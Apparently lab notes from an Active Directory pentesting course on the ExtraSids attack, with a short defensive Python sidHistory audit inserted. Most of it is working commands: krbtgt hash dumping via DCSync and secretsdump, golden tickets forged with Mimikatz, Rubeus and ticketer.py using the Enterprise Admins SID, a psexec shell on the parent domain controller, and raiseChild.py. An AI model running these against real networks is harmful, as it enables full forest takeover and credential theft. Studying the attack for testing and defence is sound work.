ExtraSids

Windows

The sidHistory attribute is used in migration scenarios. If a user in one domain is migrated to another domain, a new account is created in the second domain. The original user's SID will be added to the new user's SID history attribute, ensuring that the user can still access resources in the original domain.

SID history is intended to work across domains, but can work in the same domain. Using Mimikatz, an attacker can perform SID history injection and add an administrator account to the SID History attribute of an account they control. When logging in with this account, all of the SIDs associated with the account are added to the user's token.

This token is used to determine what resources the account can access. If the SID of a Domain Admin account is added to the SID History attribute of this account, then this account will be able to perform DCSync and create a Golden Ticket, a forged Kerberos ticket-granting ticket (TGT), which allows us to authenticate as any account of our choosing in the domain for further persistence.

ExtraSids-Mimikatz

This attack allows for the compromise of a parent domain once the child domain has been compromised. Within the same AD forest, the sidHistory property is respected due to a lack of SID Filtering protection. Therefore, if a user in a child domain has their sidHistory set to the Enterprise Admins group (which only exists in the parent domain), they are treated as a member of this group, which allows for administrative access to the entire forest. In other words, we are creating a Golden Ticket from the compromised child domain to compromise the parent domain. In this case, we will leverage the SIDHistory to grant an account (or a non-existent account) Enterprise Admin rights by setting this attribute to contain the SID of the Enterprise Admins group, which gives us full access to the parent domain without actually being a member of the group.
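As an added example (not part of the original notes), the defender's counterpart to the injection described above: audit each account's exported sidHistory for built-in group RIDs (such as 519, Enterprise Admins) or SIDs from another domain. The account list below is constructed; the two domain SIDs reuse the lab values from these notes.

```python
import re

# Domain SID followed by a RID: S-1-5-21-<a>-<b>-<c>-<rid>
SID_RE = re.compile(r"^(S-1-5-21(?:-\d+){3})-(\d+)$")

# Built-in group RIDs that a migrated user's sidHistory should never carry
PRIVILEGED_RIDS = {512: "Domain Admins", 516: "Domain Controllers",
                   518: "Schema Admins", 519: "Enterprise Admins"}


def split_sid(sid):
    """Return (domain_sid, rid) for a domain SID, or raise ValueError."""
    m = SID_RE.match(sid)
    if not m:
        raise ValueError("not a domain SID: %s" % sid)
    return m.group(1), int(m.group(2))


def audit_sid_history(account_domain_sid, sid_history):
    """Return (sid, reason) findings for one account's sidHistory values.

    A legitimate migration copies the user's old SID (RID >= 1000) from the
    old domain, so that case is only reported as 'foreign domain' for review;
    a built-in group RID such as 519 is the injection pattern described above.
    """
    findings = []
    for sid in sid_history:
        domain_sid, rid = split_sid(sid)
        if rid in PRIVILEGED_RIDS:
            findings.append((sid, "privileged group " + PRIVILEGED_RIDS[rid]))
        elif rid < 1000:
            findings.append((sid, "well-known RID %d" % rid))
        elif domain_sid != account_domain_sid:
            findings.append((sid, "foreign domain " + domain_sid))
    return findings


def audit_accounts(accounts):
    """accounts: iterable of (name, domain_sid, sid_history) -> {name: findings}."""
    report = {}
    for name, domain_sid, history in accounts:
        findings = audit_sid_history(domain_sid, history)
        if findings:
            report[name] = findings
    return report


# Constructed sample export; the two domain SIDs reuse the lab values above
CHILD_SID = "S-1-5-21-2806153819-209893948-922872689"
PARENT_SID = "S-1-5-21-3842939050-3880317879-2865463114"
SAMPLE = [("hacker", CHILD_SID, [PARENT_SID + "-519"]),     # injected EA SID
          ("migrated", CHILD_SID, [PARENT_SID + "-1105"]),  # ordinary migration
          ("jdoe", CHILD_SID, [])]
```

Running `audit_accounts(SAMPLE)` reports only `hacker` (privileged group) and `migrated` (foreign domain, for review); `jdoe` is clean.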

First, we need to obtain the NT hash for the KRBTGT account, which is a service account for the Key Distribution Center (KDC) in Active Directory. The account KRB (Kerberos) TGT (Ticket Granting Ticket) is used to encrypt/sign all Kerberos tickets granted within a given domain. Domain controllers use the account's password to decrypt and validate Kerberos tickets. The KRBTGT account can be used to create Kerberos TGT tickets that can be used to request TGS tickets for any service on any host in the domain. This is also known as the Golden Ticket attack and is a well-known persistence mechanism for attackers in Active Directory environments. The only way to invalidate a Golden Ticket is to change the password of the KRBTGT account, which should be done periodically and definitely after a penetration test assessment where full domain compromise is reached.

We need the following:

  • The KRBTGT hash for the child domain
  • The SID for the child domain
  • The name of a target user in the child domain (does not need to exist!)
  • The FQDN of the child domain
  • The SID of the Enterprise Admins group of the root domain

With this data collected, the attack can be performed with Mimikatz.

  1. DCSync to get the NT hash:

lsadump::dcsync /user:LOGISTICS\krbtgt

We can either find the SID of the child domain in the mimikatz output, or get both SIDs from:

lsadump::trust /patch

We can use PowerView too:

Get-DomainSID

  2. Enterprise Admins group's SID

Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid

or

Get-ADGroup -Identity "Enterprise Admins" -Server "INLANEFREIGHT.LOCAL"

To confirm that we have no access yet, check:

ls \\academy-ea-dc01.inlanefreight.local\c$

  3. Create Golden Ticket

Mimikatz:

mimikatz.exe

kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt

The /sids value is the root domain SID with -519 (the Enterprise Admins RID) appended.

Rubeus:

.\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689  /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt

The user can be a made-up name or Administrator.

Then check that the ticket is in memory with klist.

Now the listing works:

ls \\academy-ea-dc01.inlanefreight.local\c$

DCSync

For example, targeting lab_adm:

lsadump::dcsync /user:INLANEFREIGHT\lab_adm

When dealing with multiple domains and our target domain is not the same as the user's domain, we will need to specify the exact domain to perform the DCSync operation on the particular domain controller. The command for this would look like the following:

lsadump::dcsync /user:INLANEFREIGHT\lab_adm /domain:INLANEFREIGHT.LOCAL

or

lsadump::dcsync /domain:trusted.vl /dc:trusteddc.trusted.vl /all

If DCSync is not working, try:

dir \\trusteddc.trusted.vl\c$\

Then:

$sess = new-pssession -computername trusteddc.trusted.vl

or remove -computername

enter-pssession $sess

Linux

Grab krbtgt hash:

secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt

Get SID of child domain:

lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 

We can also grep for it:

lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 | grep "Domain SID"

Get the SID of the root (parent) domain, which holds the Enterprise Admins group:

lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.5 | grep -B12 "Enterprise Admins"

Append -519 (the Enterprise Admins RID) to the root domain SID.

Golden Ticket

ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker

Pop a shell

export KRB5CCNAME=hacker.ccache 
psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -target-ip 172.16.5.5

Escalating from child to parent domain

We need to specify the target domain controller and credentials for an administrative user in the child domain:

raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm
